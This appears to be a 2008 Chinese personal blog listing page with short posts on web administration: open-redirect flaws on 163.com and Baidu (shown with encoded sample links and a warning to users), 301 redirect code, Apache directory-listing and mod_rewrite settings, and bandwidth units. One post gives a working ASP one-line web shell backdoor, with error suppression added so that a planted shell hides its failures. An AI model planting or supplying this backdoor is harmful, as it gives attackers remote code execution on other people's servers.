大网站的链接也不安全-跳转漏洞

2008年7月26日 18:02 . 分类 网络相关 . 4 条评论 . 被踩 530 次 

文章作者:Slyar 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

朋友告诉我说网易163被入侵了,还被挂了马,然后他就中毒了。。。我要过来地址一看差点没气死。。。这哪是网易被入侵啊,明显就是一个跳转漏洞么。。。

现在看一下这个链接。你点击一下试试,没事,不是病毒,会跳到我的网站

http://pro.163.com/event.ng/Type=click
&Redirect=http://%77%77%77%2E%73%6C%79%61%72%2E%63%6F%6D/

其实也不能怪他,这个地址不仔细看还真的以为是网易的URL,普通人现在都知道不要点击陌生网址,可是网易咱知道啊~这可是大网站,一定没问题。。。哎,这样想的后果是很严重的。。。都是网易惹得祸。。。现在我把这个地址后面的部分还原一下。

http://pro.163.com/event.ng/Type=click&Redirect=http://www.slyar.com

看到了没,“Redirect=http://www.slyar.com”,如果把我网站的链接换成木马地址,那么恭喜你,你被网易“黑”了。。。

这个看似是网易地址的链接就是传说中的跳转漏洞了,它可以将整个链接跳转到“Redirect=”后面的网址里,这样看前面你就会以为是网易的链接,认为它是安全的,而实际上。。。

类似的跳转漏洞还有baidu:

http://utility.baidu.com/traf/click.php?
url=http://%77%77%77%2E%73%6C%79%61%72%2E%63%6F%6D/

看似是百度的链接,还原后:

http://utility.baidu.com/traf/click.php?url=http://www.slyar.com

现在这两个链接还没有被修补,估计以后会补好吧,不过到那时还会有新的跳转漏洞的。所以我希望大家在收到陌生人发来的链接时一定要看仔细,看清后面是不是有“Redirect”(重定向)或者“url”(地址)之类的东西,实在不行就不要点击,安全第一。

Tags: , ,

php和asp的301重定向代码

2008年7月22日 19:53 . 分类 网络相关 . 1 条评论 . 被踩 385 次 

文章作者:Slyar 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

使用.htaccess文件来进行301重定向,请见我的另外一篇文章《301重定向,域名更换后跳转到新域名》

如果空间不支持.htaccess文件,那么我们还可以通过php/asp代码来进行301重定向。

PHP:

在 index.php 的最顶部加入以下几行:

<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.slyar.com/");
exit();
?>

ASP:

在 index.asp 或 default.asp 的最顶部加入以下几行:

<%
Response.Status="301 Moved Permanently"
Response.AddHeader "Location","http://www.slyar.com/"
Response.End
%>

Tags: , ,

关闭Apache的目录浏览功能

2008年7月21日 6:34 . 分类 网络相关 . 没有评论 . 被踩 401 次 

文章作者:Slyar 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

用途:在目录下没有默认首页面(如index.html index.php)时防止用户浏览web目录。

记得以前没有权利修改Apache配置、服务器也不支持.htaccess文件的时候都是在每个目录下新建index.html来防止列目录的,现在提供2种方法来放置用户列web目录。

1、Apache配置文件修改法

打开Apache配置文件httpd.conf

查找 Options Indexes FollowSymLinks

修改为 Options -Indexes (减号就代表取消)

保存退出,重新启动Apache

2、.htaccess文件修改法

在.htaccess文件里加入以下内容就可以阻止目录列表的显示了。

Options -Indexes

Tags: ,

给ASP一句话木马加个容错代码

2008年7月17日 16:09 . 分类 网络相关 . 没有评论 . 被踩 511 次 

文章作者:Slyar 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

都是以前的文章,呵呵。

今天突发奇想,平常我们加在网页中的一句话木马,访问的时候总会出现这样那样的错误,比如找不到XXX之类的,那么如果我们把后门这么写呢?

<%On Error Resume Next%>
<%execute request("slyar")%>

我猜效果一定会很好……

Tags: , , ,

带宽速率的误解

2008年6月29日 10:37 . 分类 网络相关 . 1 条评论 . 被踩 609 次 

文章作者:Slyar 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

记得上学的时候有同学说她家的宽带是10M的(鬼才信),你说这也就罢了,她居然还吹她下载的时候就是10M/S……我就无语了……

第一个概念,我们常说的“几M的宽带”都是指下行速率。

第二个概念,512k、1M和2M的单位是bit,平常我们说的下载速度单位是Byte。实际上1Byte=8bit。无论是ADSL还是小区宽带,或者是当年的拨号猫,速度都是以bit为单位。

第三个概念,现在的ADSL主要的速率(指下行速率)有512K、1M、2M,而上行速率有512K和640K。

那么实际速率计算方法是:

ADSL下行速率

512K ADSL 下载 512Kbps=512/8=64KB/s

1M ADSL 下载 1Mbps=1*1024/8=128KB/s

2M ADSL 下载 2Mbps=2*1024/8=256KB/s

ADSL上行速率

上传 512Kbps/8=64KB/s

上传 640Kbps/8=80KB/s

但这只是理想状态的速率,在真实使用中还要分别减一部分的网络交换寻址信息占用的速率和线路损失。而线路损失包含两个方面:线路衰减和信噪比,这两个因素只要在正常范围内是不会引起速度大幅下降的。因此,不是2M的宽带网下载速度就是2M/S,这是一个严重的误解……

Tags:

Windows下开启apache Mod_rewrite模块

2008年6月27日 20:45 . 分类 网络相关 . 没有评论 . 被踩 712 次 

文章作者:Slyar 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。

因为要本地调试WP,所以用xampp搭了个环境,测试永久链接的时候发现Mod_rewrite没有打开,一点犯难~LINUX下我会,XP下可没试过(也许以前会,现在忘了),自己去看了下httpd.conf,发现修改起来不是很难,试了几次最后成功了,呵呵,记录一下。

系统信息:

WINXP

Apache/2.2.8

PHP/5.2.5

MySQL/5.0.51a

开启Mod_rewrite模块方法:

1、直接打开apache\conf\httpd.conf

2、搜索 LoadModule rewrite_module modules/mod_rewrite.so (可能版本不一样这个不一样,不过Apache2都是这个),去掉前面的#

3、 搜索AllowOverride None 替换为 AllowOverride All ,貌似我是换掉2个……

这样就可以了,然后.htaccess文件该怎么写怎么写,该放哪放哪,搞定!

Tags: , , ,

 上一页 1 2 3 4 5 6 7 8 下一页
关闭
E-mail It